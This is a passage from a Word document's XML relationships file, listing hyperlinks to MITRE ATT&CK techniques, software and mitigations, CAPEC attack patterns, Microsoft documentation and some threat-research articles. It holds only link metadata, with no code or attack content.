Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0106" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0075" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1077" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1086" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/570.html" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1052" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1015" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1024" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041"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ocs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1049/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/532.html" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1033" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0108" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0075" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0096" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/309.html" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0039" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/577.html" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/574.html" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0057" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0039" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1029" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E9%80%9A%E7%94%A8%E7%BC%BA%E9%99%B7%E5%88%97%E8%A1%A8" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/163.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/163.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/163.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/437.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/438.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/439.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/560.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1117" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1053" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1053" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/567.html" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0008" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0008" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0008" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0005" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0002" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/555.html" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1035" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/579.html" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/69.html" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/242.html" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1086" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/187.html" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1045" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/557.html" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0029" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1117" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/558.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1097" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1015" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1043" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/555.html" TargetMode="External"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1018" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/563.html" TargetMode="External"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/562.html" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/561.html" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1025" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1017" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/545.html" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1015" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/556.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1028" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1017" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1047" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1048" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1050" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1019" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1029" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1032" TargetMode="External"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1030" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1020" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/471.html" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1038" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/17.html" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/552.html" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/564.html" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1022" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1051" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://capec.mitre.org/data/definitions/569.html" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1017" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1041" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1026" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1027" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1042" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1021" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1031" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/mitigations/M1037" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 